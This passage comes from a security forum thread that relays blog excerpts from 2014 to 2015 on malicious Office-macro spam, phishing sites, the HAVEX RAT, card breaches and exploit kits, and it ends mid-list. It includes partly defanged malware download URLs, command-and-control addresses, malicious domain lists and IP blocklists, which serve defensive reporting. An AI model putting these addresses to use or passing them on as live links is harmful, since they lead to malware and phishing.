- http://myonlinesecurity.co.uk/rhianna-wellings-teckentrupdepot-co-uk-signature-invoice-44281-word-doc-malware/
24 Dec 2014 : Signature Invoice.doc . Current Virus total detections: 0/56*: 0/56**
* https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419409093/

** https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419409548/
___

Fake Christmas offers infect PCs with banking Trojan
- https://blog.malwarebytes.org/fraud-scam/2014/12/santas-fake-christmas-offers-infect-pcs-with-banking-trojan/
Dec 24, 2014 - "... The email is accompanied by a Word document with a catchy name: CHRISTMAS OFFERS.docx:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/xmas_message.png
... the document is blank and requires the user to enable macros in order to view it. By default Microsoft Office disables macros, a handy automation feature but also a huge security risk. This is where the social engineering lies and the crooks are counting on people so eager to see the promised content that they will push the button and get infected. Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another. At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/word_doc.png
... What happens if you were to trust the document? A remote file is downloaded from
hxxp ://jasoncurtis .co.uk/js/bin.exe and ran from the temp folder... It is known as Dridex, a banking Trojan... Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection. It is not terribly sophisticated but yet it has seen a bit of a revive in recent months with -spam- being the preferred delivery method. The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents... This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal."
___

Fake 'Postal Notification' SPAM - malicious notification.exe
- http://blog.mxlab.eu/2014/12/24/fake-postal-notification-service-emails-from-fedex-download-malicious-notification-exe/
Dec 24, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Postal Notification Service”. This email is sent from the spoofed address “”Fedex >” <voyeuristicxd@ jackpowerspiritbind .us>” and has the following body:

Screenshot: http://img.blog.mxlab.eu/2014/20141224_fedex.gif

The embedded URL, in our sample hxxp ://appimmobilier .com/notification.exe, will download the 58 kB large file notification.exe. The trojan is known as Win32/TrojanDownloader.Wauchos.AF, UDS:DangerousObject.Multi.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 56 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/de425462f1fb95c91edd01ded9337869053c4a09f11c9bec830c542fc5720be8/analysis/

:fear::fear: :mad:

AplusWebMaster
2014-12-29, 16:05
FYI...

Phish - "Your Netflix Account Has Been Suspeded"
- http://blog.mxlab.eu/2014/12/29/phishing-email-your-netflix-account-has-been-suspeded/
Dec 29, 2014 - "... intercepted a phishing campaign by email with the subject “Your Netflix Account Has Been Suspeded [#654789]”. This email is sent from the spoofed address “”secure@ netflix .ssl .co.uk” <secure@ netflix .ssl .co.uk>” and has the following body:

Screenshot: http://img.blog.mxlab.eu/2014/20141229_netflix_1.gif

In our sample, the URL takes us to the phishing site located at hxxp ://netflix-validation- uk .co .uk/~netflix/authcode.22e2839f6ea44972845f1e0b02f397ba/email_identifier=71a605276e146b93e52b0c1bfb98ade285c337b0a6b7e5f3f560fd5bb11f1d1c/d0446fac4ba6feceb507af17e1b0bca8/Login.php
This shows us an identical copy of the official Netflix login page. Screenshot of the member login form on the phishing web site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_2.gif
After submitting the login and password, the phishing process begins by asking to fill in our billing information.
> http://img.blog.mxlab.eu/2014/20141229_netflix_3.gif
Followed by filling in our credit card details:
> http://img.blog.mxlab.eu/2014/20141229_netflix_4.gif
Our account seems to be updated and we can continue:
> http://img.blog.mxlab.eu/2014/20141229_netflix_5.gif
…. straight to the official Netflix login site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_6.gif "
___

64-bit Version of HAVEX seen - ICS
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-version-of-havex-spotted/
Dec 29, 2014 - "The remote access tool (RAT) HAVEX* became the focus of the security industry after it was discovered to have played a major role in a campaign targeting industrial control systems (ICS). While observing HAVEX detections (known by different vendors as Dragonfly, Energetic Bear, and Crouching Yeti), we noticed something interesting. The Dragonfly campaign was previously believed to be compatible with only for 32-bit versions as most mission critical systems would most likely Windows XP, which has since been listed as end of support. In contrast, we came across two interesting infections running on Windows 7 systems. First 64-bit HAVEX Sighting: Based on our analysis (seen in the chain below), a file called TMPpovider023.dll, detected as BKDR64_HAVEX.A, was found, which creates several files in the file system. It should be noted that TMPprovider0<2-digit version number>.dll is a known indicator of HAVEX and is the component of this threat that interacts with the command-and-control (C&C) servers to perform downloads or receive execution commands associated with it.
> File installation chain: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/64havex1.jpg
... we’re seeing three indicators of BKDR_HAVEX:
- The file TMPProvider023.dll, as indicated above, with the number indicating the version of this HAVEX RAT (v023)
- A dropped file named 34CD.tmp.dll, detected as BKDR_HAVEX.SM. At this point, the file is being repeatedly detected and quarantined by the installed Trend Micro product. This was later found out to be version 29 or v029 of HAVEX.
- C&C communication from the host and back
... a 64-bit file, was upgraded to a 32-bit v029 HAVEX RAT. This now brings us to four files that seem to be interrelated in one single infection, as seen below:
File name SHA1 Compile Date Architecture
%TEMP%\TMPprovider023.dll 997C0EDC9E8E67FA0C0BC88D6FDEA512DD8F7277 2012-10-03 AMD64
%TEMP%\34CD.tmp.dll CF5755D167077C1F8DEEDDEAFEBEA0982BEED718 2013-04-30 I386
%TEMP%\734.tmp.dll BFDDB455643675B1943D4E33805D6FD6884D592F 2013-08-16 I386
%TEMP%\4F2.tmp.dll 8B634C47087CF3F268AB7EBFB6F7FBCFE77D1007 2013-06-27 I386
... In this particular infection, the v023 HAVEX file was using the same command-and-control server as that of the v029 HAVEX file... Currently, we have seen at least four IP addresses communicating to the command-and-control server, two of which have exhibited the behavior of upgrading the version of the C&C module of the HAVEX RAT... the HAVEX RAT has gone through several iterations—used in campaigns with ICS/SCADA and even pharmaceutical targets, nothing prevents it from being used again and again. ICS operators have to take note that the structure of the HAVEX binaries resemble much of what we see in common Windows malware – more so now that we’ve seen Windows 7 64-bit infections. It is thereby important to validate software being installed on endpoints within the environment, and to frequently monitor HTTP traffic..."
(More detail at the trendmicro URL at the top of this post.)
* Havex infection (ICS)/SCADA systems chain:
> http://about-threats.trendmicro.com/resources/images/HAVEX_2.jpg

:mad: :fear:

AplusWebMaster
2014-12-30, 23:01
FYI...

'Worm' removed at hacked South Korea nuclear operator
- http://www.reuters.com/article/2014/12/30/us-nuclear-southkorea-cybersecurity-idUSKBN0K80J620141230
Dec 30, 2014 - "South Korean authorities have found evidence that a low-risk computer "worm" had been removed from devices connected to some nuclear plant control systems, but no harmful virus was found in reactor controls threatened by a hacker. Korea Hydro & Nuclear Power Co Ltd said it would beef up cyber security by hiring more IT security experts and forming an oversight committee, as it came in for fresh criticism from lawmakers following recent hacks against its headquarters. The nuclear operator, part of state-run utility Korea Electric Power Corp, said earlier this month that non-critical data had been stolen from its systems, while a hacker threatened in Twitter messages to close three reactors. The control systems of the two complexes housing those reactors had not been exposed to any malignant virus, Seoul's energy ministry and nuclear watchdog said in a joint statement on Tuesday, adding the systems were -inaccessible- from external networks. The nuclear plant operator said on Tuesday it was increasing the number of staff devoted to cyber security from 53 to around 70, and would set up a committee of internal and external experts to oversee security..."
___

Target hacks hit OneStopParking .com
- http://krebsonsecurity.com/2014/12/target-hackers-hit-onestopparking-com/
Dec 30, 2014 - "Parking services have taken a beating this year at the hands of hackers bent on stealing credit and debit card data. This week’s victim — onestopparking .com — comes compliments of the same organized crime gang thought to be responsible for stealing tens of millions of card numbers from shoppers at Target and Home Depot. Late last week, the cybercrime shop best known for being the first to sell cards stolen in the Target and Home Depot breach moved a new batch of cards taken from an unknown online merchant. Several banks contacted by KrebsOnSecurity acquired cards from this batch, and determined that all had one thing in common: They’d all been used at onestopparking .com, a Florence, Ky. based company that provides low-cost parking services at airport hotels and seaports throughout the United States. Contacted about the suspicious activity that banks have traced back to onestopparking .com, Amer Ghanem, the site’s manager, said the company began receiving complaints from customers about a week before Christmas...
Cards from the “Solidus” base at Rescator map back to One Stop Parking
> http://krebsonsecurity.com/wp-content/uploads/2014/12/solidus-600x291.png
This was the second time in as many weeks that this cybercrime shop –Rescator[dot]cm — has put up for sale a batch of credit cards stolen from an online parking service: On Dec. 16, this KrebsOnSecurity reported that the same shop was selling cards stolen from Park-n-Fly, a competing airport parking reservation service. Sometime over the past few days, Park-n-Fly announced it was suspending its online service... a security update posted on the company’s site*. Park ‘N Fly noted that it is still taking reservations over the phone... Last month, SP Plus — a Chicago-based parking facility provider — said** payment systems at 17 parking garages in Chicago, Philadelphia and Seattle that were -hacked- to capture credit card data after thieves installed malware to access credit card data from a remote location. Card data stolen from those SP+ locations ended up for sale on a competing cybercrime -store- called Goodshop. In Missouri, the St. Louis Parking Company recently disclosed*** that it learned of a breach involving card data -stolen- from its Union Station Parking facility between Oct. 6, 2014 and Oct. 31, 2014."
* http://www.pnf.com/security-update/

** http://www.qconline.com/news/illinois/parking-garages-hacked-for-credit-card-data/article_dabd4256-2aa2-5005-b09e-30feecb95eb1.html

*** http://stlouisparking.com/press-release/
___

Instagram Profile Deletion Hoax
- https://blog.malwarebytes.org/fraud-scam/2014/12/january-1st-instagram-profile-deletion-hoax/
Dec 30, 2014 - "... accounts on Instagram claiming a mass purge is coming on January 1, 2015 unless your account is “verified”, with the aid of a so-called Verification Arrow. Profiles such as the one below (with 110k followers at time of writing) are receiving a fair amount of traction with between 5,000-8,000 likes per image (I got 6 for a picture of a cat once), stating:

If your account doesn't have a picture of an arrow next to it then it's in the process of being deleted. To get your arrow, please follow the instructions below
1) Follow @verifyingarrows
2) Repost our photo
3) Tag @verifyingarrows
4) Hashtag #verifyingarrows
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow2.jpg
Here’s a similar profile – now deleted – which managed to grab 245k followers before being banned itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow1.jpg
The “arrow” in question appears to be nothing more than a drop down box on profiles which suggests accounts similar to the one you’re looking at. It has -nothing- to do with profile verification or dodging deletion waves. Regardless, panicked Instagram users appear to be jumping on the ban(d)wagon and doing what they can to fend off a profile extinction event that is never going to arrive. In terms of what the ultimate end game is with all of this, it’s a case of wait and see for the time being. This is either just a -hoax- for the sake of it, or maybe the accounts asking people to bolster their visibility on Instagram will suddenly start selling something come the New Year. Whatever they’re up to, you can safely -ignore- these profiles and carry on taking selfies and pictures of sandwiches, with or without a filter."
___

Apple Store 'Transaction Cancellation Form' Phish...
- http://www.hoax-slayer.com/apple-store-transaction-cancellation-phishing-scam.shtml
Dec 30, 2014 - "According to this email, which purports to be from Apple, you have purchased a TomTom from the Apple Store (GPS car navigation system). The email explains that, if you did not authorise the TomTom purchase, you should click-a-link-to-access an Apple Store Transaction Cancellation Form. Supposedly, by filling in the form, the purchase will be cancelled and you will receive a full refund. However, the email is -NOT- from Apple and the claim that you have bought a Tom Tom is just a ruse designed to trick you into clicking the 'cancel' link.
Clicking the link takes you to a website that hosts a -fake- Apple Store 'Cancellation' form. The -fake- form asks you to provide name and contact details as well as your credit card and banking information.
Clicking the 'Cancel Transaction' button will send all of your information to criminals who can then use it to commit financial -fraud- and identity theft.
The scammers bank on the fact that at least a few recipients of the email will be -panicked- into clicking the link and supplying their information in the mistaken belief that someone has made fraudulent purchases in their name."
> http://www.hoax-slayer.com/images/apple-store-transaction-cancellation-phishing-scam-1.jpg

:fear::fear: :mad:

AplusWebMaster
2014-12-31, 21:59
FYI...

'NetGuard Toolbar' SPAM
- http://blog.dynamoo.com/2014/12/netguard-toolbar-ngcmpcom-spam.html
31 Dec 2014 - "Sometimes a spam comes through and it isn't immediately obvious what they are trying to do:
From: Brad Lorien [bclorien@ ngcmp .com]
Date: 31 December 2014 at 01:12
Subject: Real estate (12/30/2014)
Our company reaches an online community of almost 41 million people,
who are mostly US and Canadian based. We have the ability to present
our nearly 41 million strong network with a best, first choice when
they are looking online for what your company does.
We are seeking a preferred choice to send our people who are looking
for real estate in Abilene and surrounding markets.
I’m in the office weekdays from 9:00 AM to 5:00 PM Pacific time.
Best regards,
Brad Lorien
Network Specialist, SPS EServices
Phone: (877) 489.2929, ext. 64

There is no link or attachment in the email. So presumably the spammer is soliciting replies to the email address bclorien@ ngcmp .com which is a valid address. The domain ngcmp.com uses a mail server mail.ngcmp .com to receive email messages, hosted on 38.71.66.127 (PSInet / Virtual Empire, US)... the spam was sent via a relay at 38.71.66.126 which is one IP different from the server handling incoming mail, which pretty much firmly identifies that whoever controls the ngcmp .com domain is actually sending the spam. The mail headers also identify the originating IP as well as the relay, which is a Verizon Wireless customer at 75.215.49.211, possibly someone sending spam using throwaway cell phones to avoid being traced. An examination of those two PSInet addresses shows the following domains are associated with them:
ncmp .co
ngmp .co
ngcmp .com
ng-portal .com
ngcmp .net
ng-central .net
luxebagscloset .com
reviewwordofmouth .com
All of these domains have -anonymous- WHOIS details, but you can see that there is a common pattern here. I don't recommend that you visit spam sites... I did in this case to see what it was about:
> https://2.bp.blogspot.com/-HeHlNoeUd6U/VKPab3DijjI/AAAAAAAAGEU/GhzY1GyW6ok/s1600/netguard.png
This is basically -adware- . Going back to the original spam message, these "41 million people" are presumably suckers who have downloaded this crap, and NG Systems are busy spamming out to find more low-life advertisers to fill up their network... Predictably, there seems to be -no- such corporation as "NG Systems", but if you download the Toolbar it turns out it is digitally -signed- by a company called "IP Marketing Concepts, Inc." ... The executable itself is tagged by only one AV engine* as malicious, but VirusTotal does note that it looks like a PUA. Malwr notes** that individual components appear to be Russian in origin. So all in all, this spam is being sent out by a company that goes a very, very long way to disguise its origins..."
* https://www.virustotal.com/en/file/75bd42a0ce57389cdbbcc0db9c0221e041a3a56612068a02da8425a5d860b132/analysis/1420024818/

** https://malwr.com/analysis/ZjdjZDYzMzVlZTkzNDAwM2E2Y2U1NzRjNTUyNjhmNjM/
___

PUP borrows tricks from malware authors
- https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
Dec 31, 2014 - "... These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/back-965x395.png
Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they:
Provide a value added service to users by suggesting additional programs tailored to the users’ needs.
Offer a way for software manufacturers to monetize their free applications.
Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows:
Name: adobe_flash_setup.exe
Size: 809.0 KB
MD5: d549def7dd9006954839a187304e3835
imphash: 884310b1928934402ea6fec1dbd3cf5e
Out of the box: The first thing we noticed was that the program behaves differently whether it is launched on a real physical machine or a Virtual Machine:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/schema-1024x782.png
In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player... There might be a few reasons for this:
To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics.
To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers.
Anti-vm behavior does not necessarily mean that the application is malicious, but it -is- something that many malware authors use... The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan* hints at a connection with InstallCore, a “digital content delivery platform”... There are also various other offers bundled in this installer, courtesy of “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies... Malwarebytes’ criteria for listing a program as a PUP can be viewed here**. The list is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being mislead down a path that they didn’t intend to take..."
* https://www.virustotal.com/en/file/7ecf874ceba964fdc32e989e7c706b3f3e28cbfa906c7f371a24cbae11276d0b/analysis/

** https://www.malwarebytes.org/pup/

:fear: :mad:

AplusWebMaster
2015-01-02, 02:35
FYI...

Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@ inet .ba
- http://blog.dynamoo.com/2014/12/evil-network-2177150024-eltakabel-as.html
31 Dec 2014 - "This post by Brian Krebs* drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics**..
** http://www.google.com/safebrowsing/diagnostic?site=AS:198252
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large*** collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts. An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very -many- bad sites...
*** http://bgp.he.net/AS198252#_prefixes
... appears to be a block suballocated to someone using the email address aadeno@ inet .ba. I took a look at the sites hosted in this /24... There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.
Recommended blocklist:
217.71.50.0/24 ..."
(Long list at the dynamoo URL at the top.)

* http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/

:fear::fear: :mad:

AplusWebMaster
2015-01-02, 15:00
FYI...

binarysmoney .com / clickmoneys .com / thinkedmoney .com "job" SPAM
- http://blog.dynamoo.com/2015/01/binarysmoneycom-clickmoneyscom.html
2 Jan 2015 - "I've been plagued with these for the past few days:
Date: 2 January 2015 at 11:02
Subject: response
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.
The job offers a good salary so, interested candidates please registration on the our site: www .binarysmoney .com
Attention! Accept applications only on this and next week.
Respectively submitted
Personnel department

Subject lines include:
New employment opportunities
Staff Wanted
Employment invitation
new job
New job offer
Interesting Job
response
Spamvertised sites seen so far are binarysmoney .com, clickmoneys .com and thinkedmoney .com, all multihomed on the following IPs:
46.108.40.76 (Adnet Telecom / "Oancea Mihai Gabriel Intreprindere Individuala", Romania)
201.215.67.43 (VTR Banda Ancha S.A., Chile)
31.210.63.94 (Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi, Turkey)
Another site hosted on these IPs is moneyproff .com. All the domains have apparently -fake- WHOIS details.
It looks like a money mule spam, but in fact it leads to some binary options trading crap.
> http://2.bp.blogspot.com/-91ORuyJxnpU/VKZ0LXPbKMI/AAAAAAAAGFA/cngzfgKroWg/s1600/binary-options.jpg
... that's just a Shutterstock stock photo that is pretty widely used on the web. In fact, everything about this whole thing is a cookie-cutter site with text and images copied from elsewhere. Binary options are a haven for scammers, and my opinion is that this is such a -scam- given the spammy promotion and hidden identity of the operators. I would recommend that you avoid this and also block traffic to the following IPs and domains:
46.108.40.76
201.215.67.43
31.210.63.94
clickmoneys .com
thinkedmoney .com
binarysmoney .com
moneyproff .com"

:fear::fear: :mad:

AplusWebMaster
2015-01-03, 19:31
FYI...

Fake 'Thank you' SPAM - malware
- http://myonlinesecurity.co.uk/thank-buying-acrobat-xi-pro-malware/
3 Jan 2015 - "'Thank you for buying from Acrobat XI Pro' pretending to come from Plimus Sales <receipt@ plimus .com> with a link to a malicious website is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Plimus is a genuine affiliate marketing service/reseller/payment gateway for many software companies including Adobe. If you look carefully at the email, you can see the links are to IPLIMUS -not- plimus...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Thank-you-for-buying-from-Acrobat-XI-Pr.jpg

3 January 2015: adbx1pro.exe : | Current Virus total detections: 25/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e06e0f9ceca9896713b2d54b6f3d05a981ed370a39f4bd8560df6ab369d3fb5/analysis/1420298571/

:fear::fear: :mad:

AplusWebMaster
2015-01-05, 15:53
FYI...

Phish - 'Tesco Important Notification' ...
- http://myonlinesecurity.co.uk/tesco-important-notification-phishing/
5 Jan 2015 - "'Tesco Important Notification' pretending to come from Tesco .com offering you -free- Tesco vouchers is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well. If you are unwise enough to fill in the personal details and security questions, there is a very high likelihood that information could be used to compromise any other account or log in ANYWHERE on the net... don’t ever click the link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco -bank- website but you can clearly see in the address bar, that it is -fake- ... Some versions of this -phish- will ask you fill in the html ( webpage) form that comes attached to the email...

If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg

Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2-1024x534.jpg

After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3-1024x746.jpg

Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4-1024x625.jpg

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."

:fear: :mad: :fear:

AplusWebMaster
2015-01-06, 15:26
FYI...

hqq .tv serving up Exploit kit (via Digital Ocean and Choopa)
- http://blog.dynamoo.com/2015/01/hqqtv-serving-up-exploit-kit-via.html
6 Jan 2014 - "... here's an infection chain starting from a scummy-looking video streaming site called cine-stream .net. I do not recommend visiting any of the sites labelled [donotclick]
Step 1
[donotclick]cine-stream .net/1609-le-pre-nol-est-une-ordure-en-streaming.html
89.248.170.206 (Ecatel Ltd, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561240827
Step 2
[donotclick]hqq .tv/player/embed_player.php?vid=7SO84O65X5SM&autoplay=no
199.83.130.198 (Incapsula, US)
Step 3
[donotclick]agroristaler .info/dasimotulpes16.html
128.199.48.44 (Digital Ocean, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561209263
Step 4
[donotclick]aflesministal .info/chat.html
178.62.147.144 (Digital Ocean, Netherlands)
128.199.52.108 (Digital Ocean, Netherlands)
Step 5
[donotclick]pohfefungie .co.vu/VUZQBUgAAgtAGlc.html
[donotclick]eixaaweexum .co.vu/VxFVBkgAAgtAGlc.html
108.61.165.69 (Choopa LLC / Game Servers, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420560803160
The Digital Ocean and Choopa IPs host several apparently malicious domains:
108.61.165.69
eixaaweexum .co.vu
ienaakeoke .co.vu
weswalkers .co.vu
pohfefungie .co.vu
vieleevethu .co.vu
178.62.147.144
128.199.52.108
sebitibir .info
abrisgalor .info
aflesministal .info
128.199.48.44
abibruget .info
alsonutird .info
fiflakutir .info
fistikopor .info
agroristaler .info
poliloparatoser .info
In my opinion, .co.vu domains are often bad news and are good candidates for blocking. In the mean time I would recommend the following -minimum- blocklist:
108.61.165.69
178.62.147.144
128.199.52.108
128.199.48.44 "
___

Fake 'National Payments Centre' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
6 Jan 2015 - "This -fake- financial spam has a malicious payload:
Date: 6 January 2015 at 08:56
Subject: This is your Remittance Advice #ATS29858
DO NOT REPLY TO THIS EMAIL ADDRESS
Please find attached your remittance advice from Saint Gobain UK.
For any queries relating to this remittance please notify the Payment Enquiry Team on 01484913947
Regards,
SGBD National Payments Centre

Note that this email is a forgery. Saint Gobain UK are -not- sending the spam, nor have their systems been compromised in any way. Instead, criminals are using a -botnet- to spam out malicious Excel documents. Each email has a different reference number, and the attachment file name matches. The telephone number is randomly generated in each case, using a dialling code of 01484 which is Huddersfield (in the UK). There will probably be a lot of confused people in Huddersfield at the moment.
There are actually four different versions of the -malicious- Excel file, none of which are detected by anti-virus vendors [1] [2] [3] [4] containing four different but similar macros... which then download a component from one of the following locations:
http ://213.174.162.126:8080 /mans/pops.php
http ://194.28.139.100:8080 /mans/pops.php
http ://206.72.192.15:8080 /mans/pops.php
http ://213.9.95.58:8080 /mans/pops.php
This file is downloaded as test.exe and it then saved as %TEMP%\1V2MUY2XWYSFXQ.exe. It has a VirusTotal detection rate of just 3/48*. That report shows that the malware then connects to the following URLs:
http ://194.146.136.1:8080/
http ://179.43.141.164/X9BMtSKOfaz/e&WGWM+o%3D_c%26%248/InRRqJL~L
http ://179.43.141.164/TiHlXjsnCOo8%2C/fS%24P/VZFrel2ih%2Dlv+%26aTn
http ://179.43.141.164/suELl1XsT%2CFX.k%26z4./sn%3F=/%3Ffw/HFBN@8J
http ://179.43.141.164/fhmhi/igm/c&@%7E%2Dj.==m~cg_%2B%2C%3Daggs.%2Dkgm%26$~@fk@g/a%2Cgm+lkb%2D.~$kh/
194.146.136.1 is allocated to PE "Filipets Igor Victorovych" in Ukraine. 179.43.141.164 is Private Layer Incin Panama. I would definitely recommend blocking them and possibly the entire /24s in which they are hosted. The Malwr report shows no activity, indicating that it is hardened against analysis.
Recommend blocklist:
194.146.136.1
179.43.141.164
213.174.162.126
194.28.139.100
206.72.192.15
213.9.95.58 "
1] https://www.virustotal.com/en/file/71fbb660463658b2b4d1da37286d66eba65c9732bd2c1ce1a4834071eca03451/analysis/1420539739/

2] https://www.virustotal.com/en/file/48ae571eb549056c3f6ff192c3dac181d3c9ef1f78b6ea8cca0baefdcacf0bc7/analysis/1420539746/

3] https://www.virustotal.com/en/file/11a175b70117924b4b7b547277e283408bb2777db0835c774352d4344bbea86f/analysis/1420539753/

4] https://www.virustotal.com/en/file/fa4b67f24b7dfda876fbc9fd9fd127048c5799fd005f07a904fa02cff04e8efd/analysis/1420539759/

* https://www.virustotal.com/en/file/eca46cc3a36df9c32dbe967298ddc1f6ee6790179a87b4e17d1d9b0e4bbbf87c/analysis/1420540311/

- http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
6 Jan 2015
___

Fake 'PAYMENT ADVICE' malware SPAM
- http://blog.dynamoo.com/2015/01/payment-advice-06-jan-2015-malware-spam.html
6 Jan 2015 - "This spam has a malicious attachment:
From: Celeste , Senior Accountant
Date: 6 January 2015 at 10:13
Subject: PAYMENT ADVICE 06-JAN-2015
Dear all,
Payment has been made to you in amount GBP 18898,28 by BACS.
See attachment.
Regards,
Celeste
Senior Accountant

I have only seen one sample so far, with a document BACS092459_473.doc which has a VirusTotal detection rate of 0/56* and which contains this macro... which attempts to download an additional component from:
http ://206.72.192.15:8080 /mans/pops.php
This is exactly the same file as seen in this parallel spam run** today and it has the same characteristics."
* https://www.virustotal.com/en/file/56d6b5053ad57f94ab73ff3b57a3aed5cf336f1600986e8a3634f2840602e215/analysis/1420543064/

** http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html

- http://myonlinesecurity.co.uk/senior-accountant-payment-advice-06-jan-2015-word-doc-malware/
6 Jan 2015
___

MS warns of new malware attacks w/ Office docs
- http://www.techworm.net/2015/01/microsoft-warns-new-malware-attacks-office-documents.html
Jan 5, 2015 - "Microsoft has warned its Microsoft Office users of significant rise in malware attacks through macros in Excel and Word programs. In a report published on its blog*, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in -emails- masquerading as orders or invoices. The malwares are being spread through spam emails containing following subject lines accordingly to Microsoft:
ACH Transaction Report
DOC-file for report is ready
Invoice as requested
Invoice – P97291
Order – Y24383
Payment Details
Remittance Advice from Engineering Solutions Ltd
Your Automated Clearing House Transaction Has Been Put On ...
...the attachment containing Adnel and Tarbir campaigns is usually named as following :
20140918_122519.doc
813536MY.xls
ACH Transfer 0084.doc
Automated Clearing House transfer 4995.doc
BAC474047MZ.xls
BILLING DETAILS 4905.doc
CAR014 151239.doc
ID_2542Z.xls
Fuel bill.doc
ORDER DETAILS 9650.doc
Payment Advice 593016.doc
SHIPPING DETAILS 1181.doc
SHIP INVOICE 1677.doc
SHIPPING NO.doc
Microsoft Technet blog* says that the two Trojan downloaders, TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns..."
* http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
2 Jan 2015

:fear: :mad: :fear:

AplusWebMaster
2015-01-07, 11:50
FYI...

Exploit kits on Choopa LLC / Gameservers .com IP addresses
- http://blog.dynamoo.com/2015/01/exploit-kits-on-choopa-llc.html
7 Jan 2015 - "... The characterstics of these malicious landing pages is that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE:
ooshuchahxe .co.vu
ahjoneeshae .co.vu
phamiephim .co.vu
kaemahchuum .co.vu
pahsiefoono .co.vu
kaghaingai .co.vu
buengaiyei .co.vu
ohmiajusoo .co.vu
oodeerahshe .co.vu
paotuchepha .co.vu
aedeequeekou .co.vu
eikoosiexa .co.vu
phielaingi .co.vu
thohbeekee .co.vu
